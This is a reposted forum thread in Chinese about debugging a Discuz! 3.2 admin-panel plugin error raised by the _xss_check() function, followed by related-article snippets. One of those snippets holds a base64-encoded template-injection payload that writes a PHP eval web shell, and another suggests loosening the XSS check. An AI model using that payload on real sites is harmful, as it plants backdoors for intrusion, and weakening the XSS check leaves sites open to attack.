dz php debug,开发dz插件后台提示错误

最新推荐文章于 2021-10-17 14:52:14 发布
最新推荐文章于 2021-10-17 14:52:14 发布
阅读量551 收藏
点赞数
文章标签: dz php debug

这是php的代码 0){showmessage('添加失败');}else{showmessage('添加失败');}}}?>

模板的 名称:

简介:

错误提示

Discuz! System Error

您当前的访问请求当中含有非法字符,已经被系统拒绝

PHP Debug

[Line: 0025]admin.php(discuz_application->init)

[Line: 0071]source\class\discuz\discuz_application.php(discuz_application->_init_misc)

[Line: 0552]source\class\discuz\discuz_application.php(discuz_application->_xss_check)

[Line: 0355]source\class\discuz\discuz_application.php(system_error)

[Line: 0023]source\function\function_core.php(discuz_error::system_error)

[Line: 0024]source\class\discuz\discuz_error.php(discuz_error::debug_backtrace)

回复讨论(解决方案)

请贴出你提交后php页面获取的$_SERVER['REQUEST_URI']

应该是有特殊字符,

请贴出你提交后php页面获取的$_SERVER['REQUEST_URI']

应该是有特殊字符,

我在空表单上提交也是提示这个

这个说不清楚,只能看你的$_SERVER['REQUEST_URI']这个值

抛出错误的位置在source\class\discuz\discuz_application.php,里面有个_xss_check()的私有方法,你自己看一下吧

$_SERVER['REQUEST_URI']这个值

/admin.php?action=plugins&operation=config&do=23&identifier=baoming&pmod=fabu

X2.5测试没问题,请查看你的_xss_check()方法,在source\class\discuz\discuz_application.php

是否如下所示,若不是,请替换private function _xss_check() {$temp = strtoupper(urldecode(urldecode($_SERVER['REQUEST_URI'])));if(strpos($temp, '

是不是这的事

是不是这的事

我检查了 这里都对

好像是 formhash 发送说是接受有错误

应该是formhash的问题,因为原来的_xss_check()方法是要验证formhashprivate function _xss_check() {static $check = array('"', '>', '

所以,让你改为X2.5的_xss_check()方法试试

在前台也得验证formhash,怎么就可以通过,到了后台就不行了呢

呃...能力有限,没研究过,也没遇到过

而且,根据discuz的报错,我在X2.5的discuz_application.php的_init_misc方法中没有找到执行_xss_check()的代码

不知道你的版本是多少

若是低版本就将discuz_application.php这个文件覆盖一下试试

哎 ! 我是3.2的

无论如何非常感谢jam00 结贴给分

我擦,没玩过这么高大上的版本...我下来看了一下,还真有,我看看...

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

weixin_39530269
关注
Discuz! 调试文件function_debug.php
06-08
discuz调试文件function_debug.php,到处找了好久还找到,网上下载资源太少了
DZ后台(主题)模板(界面).zip
06-16
这个是DISCUZ后台模板,或者说是后台主题界面。 里面一共有两个,分别为蓝色主题和红色主题。 其实,就把后台美化了,全部的修改只涉及CSS和部分图片,不涉及底层代码。 支持x3.1,x3.2,x3.3,x3.4,Q-Blog等版本,亲测可用。
discuz php debug,Discuz! System Error
weixin_30209891的博客
03-10 788
原标题:Discuz! System Error您当前的访问请求当中含有非法字符,已经被系统拒绝PHP Debug[Line: 0024]home.php(discuz_application->init)[Line: 0071]source/class/discuz/discuz_application.php(discuz_application->_init_misc)[Line...
discuz关闭php debug,在使用phpStorm进行Debug时警告,已解决
weixin_30545587的博客
03-18 438
在使用phpStorm进行Debug时(phpStorm断点调试),警告提示debug session was finished without being ……,如下图:It may be caused by path mappings misconfiguration or not synchronized local and remote projects. To figure out ...
dz中添加后台管理菜单
03-29 1448
dz后台菜单的管理是通过关联数组的方式进行管理,存在于文件中,以下是后台添加查看统计的操作(文件名为admin/extends.inc.php):1、admincp.php这个文件中添加后台允许访问的文件如下(红色部分为增加的文件名)if(in_array($action, array(home, settings, members, profilefields, ad
DZ论坛视频插件酷播视频插件
11-17
Discuz论坛视频插件酷播视频插件,在DISCUZ中快速实现内嵌视频的播放功能,Discuz酷播视频插件支持DiscuzX3.2/DiscuzX1.5,以自己定义的视频插件形式直接添加到dz论坛的编码中,已实现跨平台播放,支持PC,安卓,...
discuz论坛插件DZ插件 提示非正版时的安装说明
12-04
遵循以上步骤,你应该能够正确安装并使用正版的DZ插件,避免出现非正版提示。如果在安装过程中遇到任何问题,可以查阅官方文档或在Discuz! 论坛社区寻求帮助。记住,使用正版软件是保障网络安全和权益的重要措施,...
DZ网盘附件免跳转下载插件源码.zip
最新发布
06-23
主要功能:1、把网盘的分享...3、能识别安装本插件前就已发布的网盘链接。4、下载页支持DIY。5、支持百度网盘文档在线阅读。6、所有显示界面均采用模板定制,支持客户自定义模板。7、可自定义其它网盘的免跳转下载。
PHP实例开发源码-方客DZ手机模版+插件.zip
11-22
PHP实例开发源码-方客DZ手机模版+插件.zip】是一个包含PHP编程实践的资源包,主要用于展示如何在Discuz! (DZ)论坛系统中开发和实现移动设备适应的模板及插件。这个压缩包可能对那些想要深入理解PHP编程,尤其是...
discuz论坛插件DZ插件 万能投票插件 通用版v2.81
12-04
论坛指定的目录,然后在后台进行插件启用操作。升级时,只需替换原有文件,并执行数据库升级脚本,确保数据完整。 4. **使用指南** 使用该插件,管理员可以在论坛后台创建新的投票,设定投票参数,预览效果后发布...
discuz 3.x function_debug文件
12-15
discuz 论坛开启debug模式必要文件,版本兼容3.0以上所有版本
dz后台html,discuz X1.5 论坛后台站长常用操作小结
weixin_33324435的博客
06-23 531
首先进入后台。1.关闭站点‘全局’-‘站点信息’-‘关闭站点’2.修改首页导航‘界面’-‘导航设置’-在这里可以改导航名字,增加删除导航3.查找用户‘用户’-‘用户管理’-搜索(可以搜索所有用户,在用户名框内输入相关用户名,直接搜索该用户,对用户进行相关设置,资料的修改,积分的给定,密码的强行修改,奖章的颁发等)4.用户组设置与管理‘用户’-‘用户组’-在这里可以添加删除用户,点击“编辑”对相应的...
dz3.4后台admin.php修改,Discuz更改后台管理员密码,重置UCenter创建者密码,并增加对的操作....
weixin_39520979的博客
03-16 1274
1. 忘记管理员登录密码在phpMyAdmin中找到pre_common_member表,然后找到要更改密码字段的管理员用户. 确保以MD5格式编写它ucenter创始人密码是什么,例如: 64d5c9b55f3bd8da20589ca606688c03该MD5是纯文本admin,然后可以使用密码admin登录.如果您记得自己的UCenter密码,可以参考此百度经验2. 在网站目录中找到/uc_s...
dz后台html,建立discuz后台管理页面的模板
weixin_35075144的博客
06-23 646
前面建立source\admincp\admincp_test.php文件,可以用模板定制一下输出格式。修改source\admincp\admincp_test.php:/*** [Discuz!] (C)2001-2099 Comsenz Inc.* This is NOT a freeware, use is subject to license terms** ...
DZ!2.5 后台拿 WebShell 方法!
fengling132的专栏
05-09 1798
直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
discuz如何进入后台管理
weixin_46240661的博客
10-17 3658
一、进入你的discuz站点 二、在上面输入你的admin账号和密码(建站的时候里面填写的) 三、如图这样就登入成功了 四、点击管理中心 五、如果出现这种情况再输入一次密码即可 六、成功进入在这里就可以管理你的discuz论坛了,或者可以自己去查看操作https://www.shanganshequ.com/ ...
dz3.4后台admin.php修改,Discuz X3.4论坛管理员无法登录后台,修改管理员账号密码的各种解决方法总结...
weixin_32679187的博客
03-18 2458
Discuz X3.4论坛管理员无法登录后台的各种解决方法总结经常有些站长会反馈网站后台无法登录的问题,在这里分享下Discuz论坛管理员无法登录后台的几种处理方法和解决思路:1、由于验证ip导致后台登录不是默认情况下Discuz!后台会认证登录IP,不允许不同IP地址同时登陆后台,解决方法很简单:在网站根目录,Discuz!配置文件config目录下config_global.php 中找到如下...
Discuz!您当前的访问请求当中含有非法字符,已经被系统拒绝解决办法
热门推荐
土著人宁巴的Discuz!专栏
04-06 3万+
Discuz!系统的_xss_check()函数原本的意义是为了论坛安全,防止XSS攻击,一般网站使用是不会出现什么问题的,但是有些网站要接入第三方接口,当第三方接口向本站post数据的时候就会报"您当前的访问请求当中含有非法字符,已经被系统拒绝",本文介绍一种简单的修改方法避免此错误。 解决方案如下: \source\class\discuzdiscuz_application.php
discuz X3.x 您当前的访问请求当中含有非法字符,已经被系统拒绝
weixin_33727510的博客
02-01 1096
2019独角兽企业重金招聘Python工程师标准>>> ...
Discuz!插件开发入门指南
插件开发实例讲解" 在互联网社区的发展中,Discuz!作为一款流行的论坛程序,因其强大的功能和灵活性深受广大站长的喜爱。然而,为了满足日益增长的个性化需求,Discuz!标准程序有时无法完全覆盖所有功能,这时插件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值